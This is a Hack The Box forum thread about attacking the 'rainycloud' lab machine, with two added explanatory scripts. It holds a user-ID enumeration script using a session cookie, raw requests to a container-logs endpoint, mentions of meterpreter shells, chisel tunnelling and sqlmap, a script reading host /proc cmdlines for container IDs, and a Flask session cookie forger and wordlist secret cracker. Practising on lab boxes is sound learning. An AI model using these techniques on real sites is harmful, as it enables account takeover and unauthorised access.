Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:03 AM
I'm still trying to brute force the JSON params, gonna try to crack the rest of the hashes.

Posts: 28 Threads: 0 Joined: N/A October 16, 2022 at 2:13 AM
(October 16, 2022, 02:03 AM)vuln63 Wrote: I'm still trying to brute force the JSON params, gonna try to crack the rest of the hashes.
HTB is not about brute force. Find the library and framework used in the backend and just google it.

Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:18 AM
I wrote this function to see if there are any hidden user accounts on the web server, but nothing:

    import requests
    from colorama import Fore

    def userid():
        ids = []
        # gary's session cookie; the API refuses other users' records with a fixed message
        headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc",
                   "Content-Type": "application/json"}
        for i in range(1000):
            url = f'http://dev.rainycloud.htb/api/user/{i}.0'
            print(Fore.RED + f"Trying Userid: {i}")
            r = requests.get(url, headers=headers, verify=False)
            # anything that is neither the "not allowed" message nor an empty object is a hit
            if "Not allowed to view other users info!" not in r.text and "{}" not in r.text:
                ids.append(i)
                print(Fore.YELLOW + f"Found Valid Userid: {i}")
        # ids is a list, so it has to be formatted into a string before prefixing the colour code
        print(Fore.YELLOW + f"Valid userids: {ids}")

(October 16, 2022, 02:13 AM)m4rsh3ll Wrote: (October 16, 2022, 02:03 AM)vuln63 Wrote: I'm still trying to brute force the JSON params, gonna try to crack the rest of the hashes.
HTB is not about brute force. Find the library and framework used in the backend and just google it.
Thanks man, I'll try it.
Found a URL in a .js file: https://stackoverflow.com/a/23054920/

Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 2:45 AM
(October 16, 2022, 02:13 AM)m4rsh3ll Wrote: (October 16, 2022, 02:03 AM)vuln63 Wrote: I'm still trying to brute force the JSON params, gonna try to crack the rest of the hashes.
HTB is not about brute force. Find the library and framework used in the backend and just google it.
did u root the box?

Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 5:01 AM
I'm checking the Docker registry for source code.

Posts: 9 Threads: 0 Joined: N/A October 16, 2022 at 8:29 AM
This has nothing to do with brute.. maybe get an account... then you have access to containers.. and they obviously can run commands etc.. that's your initial foothold :)

Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 10:53 AM
(October 16, 2022, 08:29 AM)B00mer445 Wrote: This has nothing to do with brute.. maybe get an account... then you have access to containers.. and they obviously can run commands etc.. that's your initial foothold :)
I already got an account as gary
and I created a docker container, got a meterpreter shell on it and used chisel to tunnel my way to get access to dev.rainycloud.htb

Posts: 20 Threads: 0 Joined: N/A October 16, 2022 at 11:33 AM
Posting here a thought, maybe helps anyone...
When you are inside a container, it seems like the /proc folder of the host is mounted, so we can basically see all the processes running. You will think, and why would that be useful? Well, there's a container named "Secrets" and the owner is "jack". We can read the logs with a POST request to /containers and the hash of the container; the thing is that we couldn't get the hash. BUT since we can read the processes, we can get the hash of the container, something like this:

2022/10/16 11:26:08 CMD: UID=0 PID=9888 | /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 40003 -container-ip 172.18.0.5 -container-port 40003
2022/10/16 11:26:08 CMD: UID=0 PID=9824 | tail -f /logfile
2022/10/16 11:26:08 CMD: UID=0 PID=9802 | /usr/bin/containerd-shim-runc-v2 -namespace moby -id 307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a -address /run/containerd/containerd.sock

But when you try to read the logs of that container we get the "Unauthorized" response:

POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 79
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.5
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
Connection: close

action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a

HTTP/1.1 403 FORBIDDEN
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 16 Oct 2022 11:28:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12
Connection: close
Vary: Cookie

Unauthorized

Playing around with this... Will post if I find anything new :D

Edit1: Btw, I tried with the dev. VHOST, same response...

❯ proxychains curl -v http://dev.rainycloud.htb/containers -b 'session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo' -d 'action=logs&id=307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
*   Trying 172.18.0.1:80...
* Connected to dev.rainycloud.htb (127.0.0.1) port 80 (#0)
> POST /containers HTTP/1.1
> Host: dev.rainycloud.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sv8w.13UkemgtOFLD5fH_sK55yUZshVo
> Content-Length: 79
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 FORBIDDEN
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 16 Oct 2022 11:29:30 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 12
< Connection: keep-alive
< Vary: Cookie
<
* Connection #0 to host dev.rainycloud.htb left intact
Unauthorized
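The post above gets the container ID out of pspy output. The same data is sitting in /proc/<pid>/cmdline of every visible host process, so it can be pulled without dropping a binary on the box. The script below is an added example, not code from the thread or from the box: it parses NUL-separated cmdlines, takes the 64-hex ID after containerd-shim's -id flag and the host-port to container-ip:port mapping from docker-proxy. The three SAMPLE_CMDLINES entries are constructed from the pspy lines quoted above (the PIDs, ports and ID are copied from them; the byte layout is made up to match what /proc stores), and the --live switch is this script's own.

```python
"""Pull container IDs and published port mappings out of /proc/<pid>/cmdline.

Added example, not code from the thread. If host processes such as
containerd-shim are visible from inside a container, the container shares the
host PID namespace (or has the host's /proc mounted), and every host process's
/proc/<pid>/cmdline can be read. containerd-shim carries the full container ID
after "-id"; docker-proxy carries host-port -> container-ip:port. Run with
--live to read the real /proc; by default it runs on constructed sample data.
"""
import os
import re
import sys
from typing import Dict, List, Optional, Tuple

# Constructed sample: NUL-separated argv as stored in /proc/<pid>/cmdline,
# modelled on the three pspy lines quoted in the thread (not captured data).
SAMPLE_CMDLINES: Dict[int, bytes] = {
    9888: b"/usr/bin/docker-proxy\x00-proto\x00tcp\x00-host-ip\x000.0.0.0\x00"
          b"-host-port\x0040003\x00-container-ip\x00172.18.0.5\x00-container-port\x0040003\x00",
    9824: b"tail\x00-f\x00/logfile\x00",
    9802: b"/usr/bin/containerd-shim-runc-v2\x00-namespace\x00moby\x00-id\x00"
          b"307203fbb1c83dd11cfa2eb58e1251b9318360b1b0593a3afdabb3500c81f74a\x00"
          b"-address\x00/run/containerd/containerd.sock\x00",
}

CONTAINER_ID = re.compile(r"^[0-9a-f]{64}$")


def parse_cmdline(raw: bytes) -> List[str]:
    """Split the NUL-separated cmdline into argv, dropping the trailing empty field."""
    return [arg.decode("utf-8", errors="replace") for arg in raw.split(b"\x00") if arg]


def flag_value(argv: List[str], flag: str) -> Optional[str]:
    """Return the argument following `flag`, or None if the flag is absent or last."""
    try:
        i = argv.index(flag)
    except ValueError:
        return None
    return argv[i + 1] if i + 1 < len(argv) else None


def read_proc_cmdlines(proc: str = "/proc") -> Dict[int, bytes]:
    """Read cmdline for every numeric /proc entry; skip processes that vanish or deny access."""
    out: Dict[int, bytes] = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc, name, "cmdline"), "rb") as fh:
                out[int(name)] = fh.read()
        except OSError:
            continue
    return out


def find_containers(cmdlines: Dict[int, bytes]) -> Dict[str, int]:
    """Map full container ID -> PID of its containerd-shim."""
    found: Dict[str, int] = {}
    for pid, raw in cmdlines.items():
        argv = parse_cmdline(raw)
        if not argv or "containerd-shim" not in os.path.basename(argv[0]):
            continue
        cid = flag_value(argv, "-id")
        if cid and CONTAINER_ID.match(cid):
            found[cid] = pid
    return found


def find_published_ports(cmdlines: Dict[int, bytes]) -> List[Tuple[str, int, str, int]]:
    """(host_ip, host_port, container_ip, container_port) for each docker-proxy process."""
    ports: List[Tuple[str, int, str, int]] = []
    for raw in cmdlines.values():
        argv = parse_cmdline(raw)
        if not argv or os.path.basename(argv[0]) != "docker-proxy":
            continue
        host_port = flag_value(argv, "-host-port")
        cont_port = flag_value(argv, "-container-port")
        if host_port is None or cont_port is None:
            continue
        ports.append((flag_value(argv, "-host-ip") or "", int(host_port),
                      flag_value(argv, "-container-ip") or "", int(cont_port)))
    return ports


if __name__ == "__main__":
    cmdlines = read_proc_cmdlines() if "--live" in sys.argv else SAMPLE_CMDLINES
    for cid, pid in find_containers(cmdlines).items():
        print(f"container {cid} (shim pid {pid})")
    for host_ip, host_port, cont_ip, cont_port in find_published_ports(cmdlines):
        print(f"published {host_ip}:{host_port} -> {cont_ip}:{cont_port}")
```

Knowing the ID is not the same as being authorised for it: the 403 in the post above shows /containers checks ownership server-side before returning logs, so the ID is an identifier, not a capability. The useful finding is the isolation weakness itself: a container that can see host PIDs has a much larger attack surface than one in its own PID namespace.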
Posts: 33 Threads: 0 Joined: N/A October 16, 2022 at 11:51 AM
(October 16, 2022, 11:33 AM)lnf02 Wrote: Posting here a thought, maybe helps anyone... [post quoted in full above]
Yeah I tried that, did u run pspy64 on the container?
I'm trying to crack the secret to the JWT tokens so I can forge a token. I just started running sqlmap on login, nothing so far.

Posts: 20 Threads: 0 Joined: N/A October 16, 2022 at 11:56 AM
(October 16, 2022, 11:51 AM)vuln63 Wrote: Yeah I tried that, did u run pspy64 on the container? I'm trying to crack the secret to the JWT tokens so I can forge a token.
I don't think that's the path... This machine looks more like playing with APIs and so on... Also, you can modify some values while creating the container, executing commands, reading logs, play around with - -- and --- ;)
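The session cookie pasted earlier in the thread (session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc) has the three-part layout of a Flask session: URL-safe base64 JSON, a base64 timestamp, and an HMAC-SHA1 signature that itsdangerous derives from the app's SECRET_KEY with the salt "cookie-session". The payload and timestamp are readable by anyone; only forging a different username needs the key. The script below is an added example, not code from the thread or the box: it re-implements that scheme with the standard library, decodes gary's cookie, signs a cookie under a made-up secret, and shows the offline candidate check that a wordlist attack on the secret amounts to. "constructed-secret" and the candidate list are invented for the demo.

```python
"""Decode, verify, sign and wordlist-check Flask session cookies.

Added example, not code from the thread or the box. Re-implements, with the
standard library only, the itsdangerous URLSafeTimedSerializer scheme Flask
uses for its "session" cookie:

    cookie  = b64(payload) "." b64(timestamp) "." b64(sig)
    sig     = HMAC-SHA1(derived, b64(payload) "." b64(timestamp))
    derived = HMAC-SHA1(secret_key, b"cookie-session")

b64 is URL-safe base64 with "=" padding stripped; a payload that zlib
compresses smaller is stored compressed and marked with a leading ".".
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional, Tuple

FLASK_SALT = b"cookie-session"  # Flask's default salt for the session cookie

# gary's cookie as pasted in the thread; payload and timestamp are readable
# without the key, only the signature needs the app's secret.
THREAD_COOKIE = "eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc"


def _b64decode(s: str) -> bytes:
    data = s.encode()
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _b64encode(b: bytes) -> bytes:
    return base64.urlsafe_b64encode(b).rstrip(b"=")


def decode_session(cookie: str) -> Tuple[dict, int]:
    """Return (payload, unix timestamp) without checking the signature."""
    value, _sig = cookie.rsplit(".", 1)
    payload_b64, ts_b64 = value.rsplit(".", 1)
    raw = _b64decode(payload_b64.lstrip("."))
    if payload_b64.startswith("."):
        raw = zlib.decompress(raw)
    return json.loads(raw), int.from_bytes(_b64decode(ts_b64), "big")


def _signature(secret: str, value: bytes) -> bytes:
    derived = hmac.new(secret.encode(), FLASK_SALT, hashlib.sha1).digest()
    return _b64encode(hmac.new(derived, value, hashlib.sha1).digest())


def verify_session(cookie: str, secret: str) -> bool:
    """True if `secret` reproduces the cookie's signature (constant-time compare)."""
    value, sig = cookie.rsplit(".", 1)
    return hmac.compare_digest(_signature(secret, value.encode()), sig.encode())


def sign_session(payload: dict, secret: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie Flask would accept for `payload` under `secret`."""
    ts = int(time.time()) if timestamp is None else timestamp
    # Flask's default JSON provider sorts keys and uses compact separators
    data = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    prefix = b""
    packed = zlib.compress(data)
    if len(packed) < len(data):
        data, prefix = packed, b"."
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = prefix + _b64encode(data) + b"." + _b64encode(ts_bytes)
    return (value + b"." + _signature(secret, value)).decode()


def recover_secret(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline wordlist check: the first candidate that verifies, else None."""
    for secret in candidates:
        if verify_session(cookie, secret):
            return secret
    return None


if __name__ == "__main__":
    payload, ts = decode_session(THREAD_COOKIE)
    print("payload:", payload, "issued:", time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(ts)))
    # "constructed-secret" is invented for the demo; it is not the box's key.
    forged = sign_session({"username": "jack"}, "constructed-secret")
    print("verifies with right secret:", verify_session(forged, "constructed-secret"))
    print("verifies with wrong secret:", verify_session(forged, "nope"))
    print("wordlist hit:", recover_secret(forged, ["password", "secret", "constructed-secret"]))
```

recover_secret is the whole of what a cracking tool does per candidate, two HMAC-SHA1 calls, so the attack only succeeds if SECRET_KEY is guessable; a random key of reasonable length makes forging a session for another user infeasible, and decoding the payload then only tells you which claims the app stores client-side.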